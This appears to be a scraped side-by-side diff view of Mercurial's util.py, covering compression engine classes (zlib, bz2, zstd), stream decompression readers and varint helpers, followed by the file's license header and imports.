The object is reusable but is not thread safe.

3363

The object is reusable but is not thread safe.

3351

"""

3364

"""

3352

raise NotImplementedError()

3365

raise NotImplementedError()

3353

3366

3354

class _CompressedStreamReader(object):

3367

class _CompressedStreamReader(object):

3355

def __init__(self, fh):

3368

def __init__(self, fh):

3356

if safehasattr(fh, 'unbufferedread'):

3369

if safehasattr(fh, 'unbufferedread'):

3357

self._reader = fh.unbufferedread

3370

self._reader = fh.unbufferedread

3358

else:

3371

else:

3359

self._reader = fh.read

3372

self._reader = fh.read

3360

self._pending = []

3373

self._pending = []

3361

self._pos = 0

3374

self._pos = 0

3362

self._eof = False

3375

self._eof = False

3363

3376

3364

def _decompress(self, chunk):

3377

def _decompress(self, chunk):

3365

raise NotImplementedError()

3378

raise NotImplementedError()

3366

3379

3367

def read(self, l):

3380

def read(self, l):

3368

buf = []

3381

buf = []

3369

while True:

3382

while True:

3370

while self._pending:

3383

while self._pending:

3371

if len(self._pending[0]) > l + self._pos:

3384

if len(self._pending[0]) > l + self._pos:

3372

newbuf = self._pending[0]

3385

newbuf = self._pending[0]

3373

buf.append(newbuf[self._pos:self._pos + l])

3386

buf.append(newbuf[self._pos:self._pos + l])

3374

self._pos += l

3387

self._pos += l

3375

return ''.join(buf)

3388

return ''.join(buf)

3376

3389

3377

newbuf = self._pending.pop(0)

3390

newbuf = self._pending.pop(0)

3378

if self._pos:

3391

if self._pos:

3379

buf.append(newbuf[self._pos:])

3392

buf.append(newbuf[self._pos:])

3380

l -= len(newbuf) - self._pos

3393

l -= len(newbuf) - self._pos

3381

else:

3394

else:

3382

buf.append(newbuf)

3395

buf.append(newbuf)

3383

l -= len(newbuf)

3396

l -= len(newbuf)

3384

self._pos = 0

3397

self._pos = 0

3385

3398

3386

if self._eof:

3399

if self._eof:

3387

return ''.join(buf)

3400

return ''.join(buf)

3388

chunk = self._reader(65536)

3401

chunk = self._reader(65536)

3389

self._decompress(chunk)

3402

self._decompress(chunk)

3390

if not chunk and not self._pending and not self._eof:

3403

if not chunk and not self._pending and not self._eof:

3391

# No progress and no new data, bail out

3404

# No progress and no new data, bail out

3392

return ''.join(buf)

3405

return ''.join(buf)

3393

3406

3394

class _GzipCompressedStreamReader(_CompressedStreamReader):

3407

class _GzipCompressedStreamReader(_CompressedStreamReader):

3395

def __init__(self, fh):

3408

def __init__(self, fh):

3396

super(_GzipCompressedStreamReader, self).__init__(fh)

3409

super(_GzipCompressedStreamReader, self).__init__(fh)

3397

self._decompobj = zlib.decompressobj()

3410

self._decompobj = zlib.decompressobj()

3398

def _decompress(self, chunk):

3411

def _decompress(self, chunk):

3399

newbuf = self._decompobj.decompress(chunk)

3412

newbuf = self._decompobj.decompress(chunk)

3400

if newbuf:

3413

if newbuf:

3401

self._pending.append(newbuf)

3414

self._pending.append(newbuf)

3402

d = self._decompobj.copy()

3415

d = self._decompobj.copy()

3403

try:

3416

try:

3404

d.decompress('x')

3417

d.decompress('x')

3405

d.flush()

3418

d.flush()

3406

if d.unused_data == 'x':

3419

if d.unused_data == 'x':

3407

self._eof = True

3420

self._eof = True

3408

except zlib.error:

3421

except zlib.error:

3409

pass

3422

pass

3410

3423

3411

class _BZ2CompressedStreamReader(_CompressedStreamReader):

3424

class _BZ2CompressedStreamReader(_CompressedStreamReader):

3412

def __init__(self, fh):

3425

def __init__(self, fh):

3413

super(_BZ2CompressedStreamReader, self).__init__(fh)

3426

super(_BZ2CompressedStreamReader, self).__init__(fh)

3414

self._decompobj = bz2.BZ2Decompressor()

3427

self._decompobj = bz2.BZ2Decompressor()

3415

def _decompress(self, chunk):

3428

def _decompress(self, chunk):

3416

newbuf = self._decompobj.decompress(chunk)

3429

newbuf = self._decompobj.decompress(chunk)

3417

if newbuf:

3430

if newbuf:

3418

self._pending.append(newbuf)

3431

self._pending.append(newbuf)

3419

try:

3432

try:

3420

while True:

3433

while True:

3421

newbuf = self._decompobj.decompress('')

3434

newbuf = self._decompobj.decompress('')

3422

if newbuf:

3435

if newbuf:

3423

self._pending.append(newbuf)

3436

self._pending.append(newbuf)

3424

else:

3437

else:

3425

break

3438

break

3426

except EOFError:

3439

except EOFError:

3427

self._eof = True

3440

self._eof = True

3428

3441

3429

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):

3442

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):

3430

def __init__(self, fh):

3443

def __init__(self, fh):

3431

super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)

3444

super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)

3432

newbuf = self._decompobj.decompress('BZ')

3445

newbuf = self._decompobj.decompress('BZ')

3433

if newbuf:

3446

if newbuf:

3434

self._pending.append(newbuf)

3447

self._pending.append(newbuf)

3435

3448

3436

class _ZstdCompressedStreamReader(_CompressedStreamReader):

3449

class _ZstdCompressedStreamReader(_CompressedStreamReader):

3437

def __init__(self, fh, zstd):

3450

def __init__(self, fh, zstd):

3438

super(_ZstdCompressedStreamReader, self).__init__(fh)

3451

super(_ZstdCompressedStreamReader, self).__init__(fh)

3439

self._zstd = zstd

3452

self._zstd = zstd

3440

self._decompobj = zstd.ZstdDecompressor().decompressobj()

3453

self._decompobj = zstd.ZstdDecompressor().decompressobj()

3441

def _decompress(self, chunk):

3454

def _decompress(self, chunk):

3442

newbuf = self._decompobj.decompress(chunk)

3455

newbuf = self._decompobj.decompress(chunk)

3443

if newbuf:

3456

if newbuf:

3444

self._pending.append(newbuf)

3457

self._pending.append(newbuf)

3445

try:

3458

try:

3446

while True:

3459

while True:

3447

newbuf = self._decompobj.decompress('')

3460

newbuf = self._decompobj.decompress('')

3448

if newbuf:

3461

if newbuf:

3449

self._pending.append(newbuf)

3462

self._pending.append(newbuf)

3450

else:

3463

else:

3451

break

3464

break

3452

except self._zstd.ZstdError:

3465

except self._zstd.ZstdError:

3453

self._eof = True

3466

self._eof = True

3454

3467

3455

class _zlibengine(compressionengine):

3468

class _zlibengine(compressionengine):

3456

def name(self):

3469

def name(self):

3457

return 'zlib'

3470

return 'zlib'

3458

3471

3459

def bundletype(self):

3472

def bundletype(self):

3460

"""zlib compression using the DEFLATE algorithm.

3473

"""zlib compression using the DEFLATE algorithm.

3461

3474

3462

All Mercurial clients should support this format. The compression

3475

All Mercurial clients should support this format. The compression

3463

algorithm strikes a reasonable balance between compression ratio

3476

algorithm strikes a reasonable balance between compression ratio

3464

and size.

3477

and size.

3465

"""

3478

"""

3466

return 'gzip', 'GZ'

3479

return 'gzip', 'GZ'

3467

3480

3468

def wireprotosupport(self):

3481

def wireprotosupport(self):

3469

return compewireprotosupport('zlib', 20, 20)

3482

return compewireprotosupport('zlib', 20, 20)

3470

3483

3471

def revlogheader(self):

3484

def revlogheader(self):

3472

return 'x'

3485

return 'x'

3473

3486

3474

def compressstream(self, it, opts=None):

3487

def compressstream(self, it, opts=None):

3475

opts = opts or {}

3488

opts = opts or {}

3476

3489

3477

z = zlib.compressobj(opts.get('level', -1))

3490

z = zlib.compressobj(opts.get('level', -1))

3478

for chunk in it:

3491

for chunk in it:

3479

data = z.compress(chunk)

3492

data = z.compress(chunk)

3480

# Not all calls to compress emit data. It is cheaper to inspect

3493

# Not all calls to compress emit data. It is cheaper to inspect

3481

# here than to feed empty chunks through generator.

3494

# here than to feed empty chunks through generator.

3482

if data:

3495

if data:

3483

yield data

3496

yield data

3484

3497

3485

yield z.flush()

3498

yield z.flush()

3486

3499

3487

def decompressorreader(self, fh):

3500

def decompressorreader(self, fh):

3488

return _GzipCompressedStreamReader(fh)

3501

return _GzipCompressedStreamReader(fh)

3489

3502

3490

class zlibrevlogcompressor(object):

3503

class zlibrevlogcompressor(object):

3491

def compress(self, data):

3504

def compress(self, data):

3492

insize = len(data)

3505

insize = len(data)

3493

# Caller handles empty input case.

3506

# Caller handles empty input case.

3494

assert insize > 0

3507

assert insize > 0

3495

3508

3496

if insize < 44:

3509

if insize < 44:

3497

return None

3510

return None

3498

3511

3499

elif insize <= 1000000:

3512

elif insize <= 1000000:

3500

compressed = zlib.compress(data)

3513

compressed = zlib.compress(data)

3501

if len(compressed) < insize:

3514

if len(compressed) < insize:

3502

return compressed

3515

return compressed

3503

return None

3516

return None

3504

3517

3505

# zlib makes an internal copy of the input buffer, doubling

3518

# zlib makes an internal copy of the input buffer, doubling

3506

# memory usage for large inputs. So do streaming compression

3519

# memory usage for large inputs. So do streaming compression

3507

# on large inputs.

3520

# on large inputs.

3508

else:

3521

else:

3509

z = zlib.compressobj()

3522

z = zlib.compressobj()

3510

parts = []

3523

parts = []

3511

pos = 0

3524

pos = 0

3512

while pos < insize:

3525

while pos < insize:

3513

pos2 = pos + 2**20

3526

pos2 = pos + 2**20

3514

parts.append(z.compress(data[pos:pos2]))

3527

parts.append(z.compress(data[pos:pos2]))

3515

pos = pos2

3528

pos = pos2

3516

parts.append(z.flush())

3529

parts.append(z.flush())

3517

3530

3518

if sum(map(len, parts)) < insize:

3531

if sum(map(len, parts)) < insize:

3519

return ''.join(parts)

3532

return ''.join(parts)

3520

return None

3533

return None

3521

3534

3522

def decompress(self, data):

3535

def decompress(self, data):

3523

try:

3536

try:

3524

return zlib.decompress(data)

3537

return zlib.decompress(data)

3525

except zlib.error as e:

3538

except zlib.error as e:

3526

raise error.RevlogError(_('revlog decompress error: %s') %

3539

raise error.RevlogError(_('revlog decompress error: %s') %

3527

stringutil.forcebytestr(e))

3540

stringutil.forcebytestr(e))

3528

3541

3529

def revlogcompressor(self, opts=None):

3542

def revlogcompressor(self, opts=None):

3530

return self.zlibrevlogcompressor()

3543

return self.zlibrevlogcompressor()

3531

3544

3532

compengines.register(_zlibengine())

3545

compengines.register(_zlibengine())

3533

3546

3534

class _bz2engine(compressionengine):

3547

class _bz2engine(compressionengine):

3535

def name(self):

3548

def name(self):

3536

return 'bz2'

3549

return 'bz2'

3537

3550

3538

def bundletype(self):

3551

def bundletype(self):

3539

"""An algorithm that produces smaller bundles than ``gzip``.

3552

"""An algorithm that produces smaller bundles than ``gzip``.

3540

3553

3541

All Mercurial clients should support this format.

3554

All Mercurial clients should support this format.

3542

3555

3543

This engine will likely produce smaller bundles than ``gzip`` but

3556

This engine will likely produce smaller bundles than ``gzip`` but

3544

will be significantly slower, both during compression and

3557

will be significantly slower, both during compression and

3545

decompression.

3558

decompression.

3546

3559

3547

If available, the ``zstd`` engine can yield similar or better

3560

If available, the ``zstd`` engine can yield similar or better

3548

compression at much higher speeds.

3561

compression at much higher speeds.

3549

"""

3562

"""

3550

return 'bzip2', 'BZ'

3563

return 'bzip2', 'BZ'

3551

3564

3552

# We declare a protocol name but don't advertise by default because

3565

# We declare a protocol name but don't advertise by default because

3553

# it is slow.

3566

# it is slow.

3554

def wireprotosupport(self):

3567

def wireprotosupport(self):

3555

return compewireprotosupport('bzip2', 0, 0)

3568

return compewireprotosupport('bzip2', 0, 0)

3556

3569

3557

def compressstream(self, it, opts=None):

3570

def compressstream(self, it, opts=None):

3558

opts = opts or {}

3571

opts = opts or {}

3559

z = bz2.BZ2Compressor(opts.get('level', 9))

3572

z = bz2.BZ2Compressor(opts.get('level', 9))

3560

for chunk in it:

3573

for chunk in it:

3561

data = z.compress(chunk)

3574

data = z.compress(chunk)

3562

if data:

3575

if data:

3563

yield data

3576

yield data

3564

3577

3565

yield z.flush()

3578

yield z.flush()

3566

3579

3567

def decompressorreader(self, fh):

3580

def decompressorreader(self, fh):

3568

return _BZ2CompressedStreamReader(fh)

3581

return _BZ2CompressedStreamReader(fh)

3569

3582

3570

compengines.register(_bz2engine())

3583

compengines.register(_bz2engine())

3571

3584

3572

class _truncatedbz2engine(compressionengine):

3585

class _truncatedbz2engine(compressionengine):

3573

def name(self):

3586

def name(self):

3574

return 'bz2truncated'

3587

return 'bz2truncated'

3575

3588

3576

def bundletype(self):

3589

def bundletype(self):

3577

return None, '_truncatedBZ'

3590

return None, '_truncatedBZ'

3578

3591

3579

# We don't implement compressstream because it is hackily handled elsewhere.

3592

# We don't implement compressstream because it is hackily handled elsewhere.

3580

3593

3581

def decompressorreader(self, fh):

3594

def decompressorreader(self, fh):

3582

return _TruncatedBZ2CompressedStreamReader(fh)

3595

return _TruncatedBZ2CompressedStreamReader(fh)

3583

3596

3584

compengines.register(_truncatedbz2engine())

3597

compengines.register(_truncatedbz2engine())

3585

3598

3586

class _noopengine(compressionengine):

3599

class _noopengine(compressionengine):

3587

def name(self):

3600

def name(self):

3588

return 'none'

3601

return 'none'

3589

3602

3590

def bundletype(self):

3603

def bundletype(self):

3591

"""No compression is performed.

3604

"""No compression is performed.

3592

3605

3593

Use this compression engine to explicitly disable compression.

3606

Use this compression engine to explicitly disable compression.

3594

"""

3607

"""

3595

return 'none', 'UN'

3608

return 'none', 'UN'

3596

3609

3597

# Clients always support uncompressed payloads. Servers don't because

3610

# Clients always support uncompressed payloads. Servers don't because

3598

# unless you are on a fast network, uncompressed payloads can easily

3611

# unless you are on a fast network, uncompressed payloads can easily

3599

# saturate your network pipe.

3612

# saturate your network pipe.

3600

def wireprotosupport(self):

3613

def wireprotosupport(self):

3601

return compewireprotosupport('none', 0, 10)

3614

return compewireprotosupport('none', 0, 10)

3602

3615

3603

# We don't implement revlogheader because it is handled specially

3616

# We don't implement revlogheader because it is handled specially

3604

# in the revlog class.

3617

# in the revlog class.

3605

3618

3606

def compressstream(self, it, opts=None):

3619

def compressstream(self, it, opts=None):

3607

return it

3620

return it

3608

3621

3609

def decompressorreader(self, fh):

3622

def decompressorreader(self, fh):

3610

return fh

3623

return fh

3611

3624

3612

class nooprevlogcompressor(object):

3625

class nooprevlogcompressor(object):

3613

def compress(self, data):

3626

def compress(self, data):

3614

return None

3627

return None

3615

3628

3616

def revlogcompressor(self, opts=None):

3629

def revlogcompressor(self, opts=None):

3617

return self.nooprevlogcompressor()

3630

return self.nooprevlogcompressor()

3618

3631

3619

compengines.register(_noopengine())

3632

compengines.register(_noopengine())

3620

3633

3621

class _zstdengine(compressionengine):

3634

class _zstdengine(compressionengine):

3622

def name(self):

3635

def name(self):

3623

return 'zstd'

3636

return 'zstd'

3624

3637

3625

@propertycache

3638

@propertycache

3626

def _module(self):

3639

def _module(self):

3627

# Not all installs have the zstd module available. So defer importing

3640

# Not all installs have the zstd module available. So defer importing

3628

# until first access.

3641

# until first access.

3629

try:

3642

try:

3630

from . import zstd

3643

from . import zstd

3631

# Force delayed import.

3644

# Force delayed import.

3632

zstd.__version__

3645

zstd.__version__

3633

return zstd

3646

return zstd

3634

except ImportError:

3647

except ImportError:

3635

return None

3648

return None

3636

3649

3637

def available(self):

3650

def available(self):

3638

return bool(self._module)

3651

return bool(self._module)

3639

3652

3640

def bundletype(self):

3653

def bundletype(self):

3641

"""A modern compression algorithm that is fast and highly flexible.

3654

"""A modern compression algorithm that is fast and highly flexible.

3642

3655

3643

Only supported by Mercurial 4.1 and newer clients.

3656

Only supported by Mercurial 4.1 and newer clients.

3644

3657

3645

With the default settings, zstd compression is both faster and yields

3658

With the default settings, zstd compression is both faster and yields

3646

better compression than ``gzip``. It also frequently yields better

3659

better compression than ``gzip``. It also frequently yields better

3647

compression than ``bzip2`` while operating at much higher speeds.

3660

compression than ``bzip2`` while operating at much higher speeds.

3648

3661

3649

If this engine is available and backwards compatibility is not a

3662

If this engine is available and backwards compatibility is not a

3650

concern, it is likely the best available engine.

3663

concern, it is likely the best available engine.

3651

"""

3664

"""

3652

return 'zstd', 'ZS'

3665

return 'zstd', 'ZS'

3653

3666

3654

def wireprotosupport(self):

3667

def wireprotosupport(self):

3655

return compewireprotosupport('zstd', 50, 50)

3668

return compewireprotosupport('zstd', 50, 50)

3656

3669

3657

def revlogheader(self):

3670

def revlogheader(self):

3658

return '\x28'

3671

return '\x28'

3659

3672

3660

def compressstream(self, it, opts=None):

3673

def compressstream(self, it, opts=None):

3661

opts = opts or {}

3674

opts = opts or {}

3662

# zstd level 3 is almost always significantly faster than zlib

3675

# zstd level 3 is almost always significantly faster than zlib

3663

# while providing no worse compression. It strikes a good balance

3676

# while providing no worse compression. It strikes a good balance

3664

# between speed and compression.

3677

# between speed and compression.

3665

level = opts.get('level', 3)

3678

level = opts.get('level', 3)

3666

3679

3667

zstd = self._module

3680

zstd = self._module

3668

z = zstd.ZstdCompressor(level=level).compressobj()

3681

z = zstd.ZstdCompressor(level=level).compressobj()

3669

for chunk in it:

3682

for chunk in it:

3670

data = z.compress(chunk)

3683

data = z.compress(chunk)

3671

if data:

3684

if data:

3672

yield data

3685

yield data

3673

3686

3674

yield z.flush()

3687

yield z.flush()

3675

3688

3676

def decompressorreader(self, fh):

3689

def decompressorreader(self, fh):

3677

return _ZstdCompressedStreamReader(fh, self._module)

3690

return _ZstdCompressedStreamReader(fh, self._module)

3678

3691

3679

class zstdrevlogcompressor(object):

3692

class zstdrevlogcompressor(object):

3680

def __init__(self, zstd, level=3):

3693

def __init__(self, zstd, level=3):

3681

# TODO consider omitting frame magic to save 4 bytes.

3694

# TODO consider omitting frame magic to save 4 bytes.

3682

# This writes content sizes into the frame header. That is

3695

# This writes content sizes into the frame header. That is

3683

# extra storage. But it allows a correct size memory allocation

3696

# extra storage. But it allows a correct size memory allocation

3684

# to hold the result.

3697

# to hold the result.

3685

self._cctx = zstd.ZstdCompressor(level=level)

3698

self._cctx = zstd.ZstdCompressor(level=level)

3686

self._dctx = zstd.ZstdDecompressor()

3699

self._dctx = zstd.ZstdDecompressor()

3687

self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE

3700

self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE

3688

self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

3701

self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

3689

3702

3690

def compress(self, data):

3703

def compress(self, data):

3691

insize = len(data)

3704

insize = len(data)

3692

# Caller handles empty input case.

3705

# Caller handles empty input case.

3693

assert insize > 0

3706

assert insize > 0

3694

3707

3695

if insize < 50:

3708

if insize < 50:

3696

return None

3709

return None

3697

3710

3698

elif insize <= 1000000:

3711

elif insize <= 1000000:

3699

compressed = self._cctx.compress(data)

3712

compressed = self._cctx.compress(data)

3700

if len(compressed) < insize:

3713

if len(compressed) < insize:

3701

return compressed

3714

return compressed

3702

return None

3715

return None

3703

else:

3716

else:

3704

z = self._cctx.compressobj()

3717

z = self._cctx.compressobj()

3705

chunks = []

3718

chunks = []

3706

pos = 0

3719

pos = 0

3707

while pos < insize:

3720

while pos < insize:

3708

pos2 = pos + self._compinsize

3721

pos2 = pos + self._compinsize

3709

chunk = z.compress(data[pos:pos2])

3722

chunk = z.compress(data[pos:pos2])

3710

if chunk:

3723

if chunk:

3711

chunks.append(chunk)

3724

chunks.append(chunk)

3712

pos = pos2

3725

pos = pos2

3713

chunks.append(z.flush())

3726

chunks.append(z.flush())

3714

3727

3715

if sum(map(len, chunks)) < insize:

3728

if sum(map(len, chunks)) < insize:

3716

return ''.join(chunks)

3729

return ''.join(chunks)

3717

return None

3730

return None

3718

3731

3719

def decompress(self, data):

3732

def decompress(self, data):

3720

insize = len(data)

3733

insize = len(data)

3721

3734

3722

try:

3735

try:

3723

# This was measured to be faster than other streaming

3736

# This was measured to be faster than other streaming

3724

# decompressors.

3737

# decompressors.

3725

dobj = self._dctx.decompressobj()

3738

dobj = self._dctx.decompressobj()

3726

chunks = []

3739

chunks = []

3727

pos = 0

3740

pos = 0

3728

while pos < insize:

3741

while pos < insize:

3729

pos2 = pos + self._decompinsize

3742

pos2 = pos + self._decompinsize

3730

chunk = dobj.decompress(data[pos:pos2])

3743

chunk = dobj.decompress(data[pos:pos2])

3731

if chunk:

3744

if chunk:

3732

chunks.append(chunk)

3745

chunks.append(chunk)

3733

pos = pos2

3746

pos = pos2

3734

# Frame should be exhausted, so no finish() API.

3747

# Frame should be exhausted, so no finish() API.

3735

3748

3736

return ''.join(chunks)

3749

return ''.join(chunks)

3737

except Exception as e:

3750

except Exception as e:

3738

raise error.RevlogError(_('revlog decompress error: %s') %

3751

raise error.RevlogError(_('revlog decompress error: %s') %

3739

stringutil.forcebytestr(e))

3752

stringutil.forcebytestr(e))

3740

3753

3741

def revlogcompressor(self, opts=None):

3754

def revlogcompressor(self, opts=None):

3742

opts = opts or {}

3755

opts = opts or {}

3743

return self.zstdrevlogcompressor(self._module,

3756

return self.zstdrevlogcompressor(self._module,

3744

level=opts.get('level', 3))

3757

level=opts.get('level', 3))

3745

3758

3746

compengines.register(_zstdengine())

3759

compengines.register(_zstdengine())

3747

3760

3748

def bundlecompressiontopics():

3761

def bundlecompressiontopics():

3749

"""Obtains a list of available bundle compressions for use in help."""

3762

"""Obtains a list of available bundle compressions for use in help."""

3750

# help.makeitemsdocs() expects a dict of names to items with a .__doc__.

3763

# help.makeitemsdocs() expects a dict of names to items with a .__doc__.

3751

items = {}

3764

items = {}

3752

3765

3753

# We need to format the docstring. So use a dummy object/type to hold it

3766

# We need to format the docstring. So use a dummy object/type to hold it

3754

# rather than mutating the original.

3767

# rather than mutating the original.

3755

class docobject(object):

3768

class docobject(object):

3756

pass

3769

pass

3757

3770

3758

for name in compengines:

3771

for name in compengines:

3759

engine = compengines[name]

3772

engine = compengines[name]

3760

3773

3761

if not engine.available():

3774

if not engine.available():

3762

continue

3775

continue

3763

3776

3764

bt = engine.bundletype()

3777

bt = engine.bundletype()

3765

if not bt or not bt[0]:

3778

if not bt or not bt[0]:

3766

continue

3779

continue

3767

3780

3768

doc = pycompat.sysstr('``%s``\n %s') % (

3781

doc = pycompat.sysstr('``%s``\n %s') % (

3769

bt[0], engine.bundletype.__doc__)

3782

bt[0], engine.bundletype.__doc__)

3770

3783

3771

value = docobject()

3784

value = docobject()

3772

value.__doc__ = doc

3785

value.__doc__ = doc

3773

value._origdoc = engine.bundletype.__doc__

3786

value._origdoc = engine.bundletype.__doc__

3774

value._origfunc = engine.bundletype

3787

value._origfunc = engine.bundletype

3775

3788

3776

items[bt[0]] = value

3789

items[bt[0]] = value

3777

3790

3778

return items

3791

return items

3779

3792

3780

i18nfunctions = bundlecompressiontopics().values()

3793

i18nfunctions = bundlecompressiontopics().values()

3781

3794

3782

# convenient shortcut

3795

# convenient shortcut

3783

dst = debugstacktrace

3796

dst = debugstacktrace

3784

3797

3785

def safename(f, tag, ctx, others=None):

3798

def safename(f, tag, ctx, others=None):

3786

"""

3799

"""

3787

Generate a name that it is safe to rename f to in the given context.

3800

Generate a name that it is safe to rename f to in the given context.

3788

3801

3789

f: filename to rename

3802

f: filename to rename

3790

tag: a string tag that will be included in the new name

3803

tag: a string tag that will be included in the new name

3791

ctx: a context, in which the new name must not exist

3804

ctx: a context, in which the new name must not exist

3792

others: a set of other filenames that the new name must not be in

3805

others: a set of other filenames that the new name must not be in

3793

3806

3794

Returns a file name of the form oldname~tag[~number] which does not exist

3807

Returns a file name of the form oldname~tag[~number] which does not exist

3795

in the provided context and is not in the set of other names.

3808

in the provided context and is not in the set of other names.

3796

"""

3809

"""

3797

if others is None:

3810

if others is None:

3798

others = set()

3811

others = set()

3799

3812

3800

fn = '%s~%s' % (f, tag)

3813

fn = '%s~%s' % (f, tag)

3801

if fn not in ctx and fn not in others:

3814

if fn not in ctx and fn not in others:

3802

return fn

3815

return fn

3803

for n in itertools.count(1):

3816

for n in itertools.count(1):

3804

fn = '%s~%s~%s' % (f, tag, n)

3817

fn = '%s~%s~%s' % (f, tag, n)

3805

if fn not in ctx and fn not in others:

3818

if fn not in ctx and fn not in others:

3806

return fn

3819

return fn

3807

3820

3808

def readexactly(stream, n):

3821

def readexactly(stream, n):

3809

'''read n bytes from stream.read and abort if less was available'''

3822

'''read n bytes from stream.read and abort if less was available'''

3810

s = stream.read(n)

3823

s = stream.read(n)

3811

if len(s) < n:

3824

if len(s) < n:

3812

raise error.Abort(_("stream ended unexpectedly"

3825

raise error.Abort(_("stream ended unexpectedly"

3813

" (got %d bytes, expected %d)")

3826

" (got %d bytes, expected %d)")

3814

% (len(s), n))

3827

% (len(s), n))

3815

return s

3828

return s

3816

3829

3817

def uvarintencode(value):

3830

def uvarintencode(value):

3818

"""Encode an unsigned integer value to a varint.

3831

"""Encode an unsigned integer value to a varint.

3819

3832

3820

A varint is a variable length integer of 1 or more bytes. Each byte

3833

A varint is a variable length integer of 1 or more bytes. Each byte

3821

except the last has the most significant bit set. The lower 7 bits of

3834

except the last has the most significant bit set. The lower 7 bits of

3822

each byte store the 2's complement representation, least significant group

3835

each byte store the 2's complement representation, least significant group

3823

first.

3836

first.

3824

3837

3825

>>> uvarintencode(0)

3838

>>> uvarintencode(0)

3826

'\\x00'

3839

'\\x00'

3827

>>> uvarintencode(1)

3840

>>> uvarintencode(1)

3828

'\\x01'

3841

'\\x01'

3829

>>> uvarintencode(127)

3842

>>> uvarintencode(127)

3830

'\\x7f'

3843

'\\x7f'

3831

>>> uvarintencode(1337)

3844

>>> uvarintencode(1337)

3832

'\\xb9\\n'

3845

'\\xb9\\n'

3833

>>> uvarintencode(65536)

3846

>>> uvarintencode(65536)

3834

'\\x80\\x80\\x04'

3847

'\\x80\\x80\\x04'

3835

>>> uvarintencode(-1)

3848

>>> uvarintencode(-1)

3836

Traceback (most recent call last):

3849

Traceback (most recent call last):

3837

...

3850

...

3838

ProgrammingError: negative value for uvarint: -1

3851

ProgrammingError: negative value for uvarint: -1

3839

"""

3852

"""

3840

if value < 0:

3853

if value < 0:

3841

raise error.ProgrammingError('negative value for uvarint: %d'

3854

raise error.ProgrammingError('negative value for uvarint: %d'

3842

% value)

3855

% value)

3843

bits = value & 0x7f

3856

bits = value & 0x7f

3844

value >>= 7

3857

value >>= 7

3845

bytes = []

3858

bytes = []

3846

while value:

3859

while value:

3847

bytes.append(pycompat.bytechr(0x80 | bits))

3860

bytes.append(pycompat.bytechr(0x80 | bits))

3848

bits = value & 0x7f

3861

bits = value & 0x7f

3849

value >>= 7

3862

value >>= 7

3850

bytes.append(pycompat.bytechr(bits))

3863

bytes.append(pycompat.bytechr(bits))

3851

3864

3852

return ''.join(bytes)

3865

return ''.join(bytes)

3853

3866

3854

def uvarintdecodestream(fh):

3867

def uvarintdecodestream(fh):

3855

"""Decode an unsigned variable length integer from a stream.

3868

"""Decode an unsigned variable length integer from a stream.

3856

3869

3857

The passed argument is anything that has a ``.read(N)`` method.

3870

The passed argument is anything that has a ``.read(N)`` method.

3858

3871

3859

>>> try:

3872

>>> try:

3860

... from StringIO import StringIO as BytesIO

3873

... from StringIO import StringIO as BytesIO

3861

... except ImportError:

3874

... except ImportError:

3862

... from io import BytesIO

3875

... from io import BytesIO

3863

>>> uvarintdecodestream(BytesIO(b'\\x00'))

3876

>>> uvarintdecodestream(BytesIO(b'\\x00'))

3864

0

3877

0

3865

>>> uvarintdecodestream(BytesIO(b'\\x01'))

3878

>>> uvarintdecodestream(BytesIO(b'\\x01'))

3866

1

3879

1

3867

>>> uvarintdecodestream(BytesIO(b'\\x7f'))

3880

>>> uvarintdecodestream(BytesIO(b'\\x7f'))

3868

127

3881

127

3869

>>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))

3882

>>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))

3870

1337

3883

1337

3871

>>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))

3884

>>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))

3872

65536

3885

65536

3873

>>> uvarintdecodestream(BytesIO(b'\\x80'))

3886

>>> uvarintdecodestream(BytesIO(b'\\x80'))

3874

Traceback (most recent call last):

3887

Traceback (most recent call last):

3875

...

3888

...

3876

Abort: stream ended unexpectedly (got 0 bytes, expected 1)

3889

Abort: stream ended unexpectedly (got 0 bytes, expected 1)

3877

"""

3890

"""

3878

result = 0

3891

result = 0

3879

shift = 0

3892

shift = 0

3880

while True:

3893

while True:

3881

byte = ord(readexactly(fh, 1))

3894

byte = ord(readexactly(fh, 1))

3882

result |= ((byte & 0x7f) << shift)

3895

result |= ((byte & 0x7f) << shift)

3883

if not (byte & 0x80):

3896

if not (byte & 0x80):

3884

return result

3897

return result

3885

shift += 7

3898

shift += 7

	Site-wide shortcuts
/	Use quick search box
g h	Goto home page
g g	Goto my private gists page
g G	Goto my public gists page
g 0-9	Goto bookmarked items from 0-9
n r	New repository page
n g	New gist page

	Repositories
g s	Goto summary page
g c	Goto changelog page
g f	Goto files page
g F	Goto files page with file search activated
g p	Goto pull requests page
g o	Goto repository settings
g O	Goto repository access permissions settings
t s	Toggle sidebar on some pages

             # util.py - Mercurial utility functions and platform specific implementations
             #
             #  Copyright 2005 K. Thananchayan <thananck@yahoo.com>
             #  Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
             #  Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
             #
             # This software may be used and distributed according to the terms of the
             # GNU General Public License version 2 or any later version.
             """Mercurial utility functions and platform specific implementations.
             This contains helper routines that are independent of the SCM core and
             hide platform-specific details from the core.
             """
             from __future__ import absolute_import, print_function
             import abc
             import bz2
             import collections
             import contextlib
             import errno
             import gc
             import hashlib
             import itertools
             import mmap
             import os
             import platform as pyplatform
             import re as remod
             import shutil
             import socket
             import stat
             import sys
             import time
             import traceback
             import warnings
             import zlib
             from .thirdparty import (
                 attr,
             )
             from hgdemandimport import tracing
             from . import (
                 encoding,
                 error,
                 i18n,
                 node as nodemod,
                 policy,
                 pycompat,
                 urllibcompat,
             )
             from .utils import (
                 procutil,
                 stringutil,
             )
             base85 = policy.importmod(r'base85')
             osutil = policy.importmod(r'osutil')
             parsers = policy.importmod(r'parsers')
             b85decode = base85.b85decode
             b85encode = base85.b85encode
             cookielib = pycompat.cookielib
             httplib = pycompat.httplib
             pickle = pycompat.pickle
